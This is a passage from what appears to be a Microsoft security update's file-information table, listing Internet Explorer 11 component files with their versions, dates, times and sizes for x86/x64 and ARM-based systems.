\njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:04| 785,408 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 19:15| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:12| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 18:58| 20,296,192 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.19963| 12-Feb-2021| 18:09| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.19963| 12-Feb-2021| 18:14| 4,112,384 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:37| 653,824 \nvbscript.dll| 5.8.9600.19963| 12-Feb-2021| 18:47| 498,176 \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 22:20| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:50| 1,343,488 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 18:12| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 4,388,352 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 12-Feb-2021| 20:31| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.19963| 12-Feb-2021| 18:11| 333,312 \ninstall.ins| Not versioned| 12-Feb-2021| 16:25| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 18:59| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.19846| 23-Sep-2020| 20:01| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 2,308,096 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19963| 12-Feb-2021| 20:32| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.19963| 12-Feb-2021| 18:17| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported ARM-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.19301| 25-Feb-2019| 21:59| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.19963| 12-Feb-2021| 17:33| 1,039,360 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.19301| 25-Feb-2019| 22:35| 320,000 \ninetcpl.cpl| 11.0.9600.19963| 12-Feb-2021| 17:51| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 12-Feb-2021| 19:30| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 